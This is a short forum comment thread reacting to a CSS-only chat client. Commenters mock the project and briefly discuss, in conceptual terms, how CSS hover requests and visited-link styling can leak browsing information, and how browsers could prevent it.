Originally published at: https://boingboing.net/2019/05/07/chat-client-made-entirely-with.html
…
Agree completely. It is a total abomination and you do seem to love it.
Some people have way way way too much free time.
Gross
For being made with CSS you’d think it’d look nicer…
At least the first part of that seems to be a common reaction, since I saw the headline, and literally my first thought was that I should leave a comment pointing out that it’s an abomination.
Neat trick and abomination as it may be, I think this is the bigger take-home message:
It occurred to me that you can remotely monitor the cursor location without JS by using some CSS :hover selectors to change hidden background images (causing a GET request).
This should work on Tor as well and could be an interesting approach to tracking visitors.
There was a similar trick to leak the contents the browser history by exploiting the difference of style between visited and unvisited links. The takeaway, I think, was: always preload resources. This was more than 15 years ago.
Apparently we’ve learned nothing.
This is a relatively minor security hole, in that it can only leak information about mouse movements (not history or other state information beyond the scope of the current page) – and it’s a strict subset of what the server can already obtain if javascript is turned on – but it’s still a leak.
I guess the moral is “when scripting is disabled, UAs should (must) load all referenced resources immediately, and not reload them via HTTP while the page is displayed, regardless of cache expiry headers”.
This topic was automatically closed after 5 days. New replies are no longer allowed.